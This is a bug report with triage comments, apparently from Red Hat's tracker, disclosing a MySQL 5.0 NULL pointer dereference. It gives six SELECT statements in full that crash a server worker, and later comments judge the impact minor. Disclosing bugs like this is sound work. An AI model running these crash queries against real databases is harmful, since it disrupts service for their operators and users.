Description of problem: A NULL pointer dereference occurs after issuing the SELECT statements below. Security impact is very limited, as only one worker crashes, leaving the server running and ready for service. Additionally, an attacker must be authenticated and permitted to execute arbitrary SELECT statements. Version-Release number of selected component (if applicable): Does not affect MySQL 4. How reproducible: Always, by an authenticated user. Steps to Reproduce: SELECT ASCII((SELECT table_name FROM information_schema.columns ORDER BY 1)); SELECT TRIM(LEADING FROM (SELECT table_name FROM information_schema.columns ORDER BY 1)); SELECT SUBSTR((SELECT table_name FROM information_schema.tables ORDER BY 1),1,1); SELECT UPPER((SELECT table_name FROM information_schema.tables ORDER BY 1)); SELECT RTRIM((SELECT table_name FROM information_schema.tables ORDER BY 1)); SELECT RPAD((SELECT table_name FROM information_schema.tables ORDER BY 1),1,'lol') Actual results: The session closes prematurely, fault message in the log file. Expected results: I expected it to crash. I like this section of a bug report.
The mysql 5.0.36/37 release notes mention something like twenty different crashing bugs fixed. What's your rationale for harping on this particular one?
tgl: a CVE. pardon me for forgetting to mention it in the Summary.
moving to security response parent bug, we only create tracking bugs once it has been decided we will fix this issue in a particular release.
Red Hat does not consider this to be a security issue. It requires an attacker to be authenticated and after triggering the crash the database server will restart and continue to service requests.
This issue was addressed in: Red Hat Enterprise Linux: http://rhn.redhat.com/errata/RHSA-2008-0364.html
Reporter changed to security-response-team by request of Jay Turner.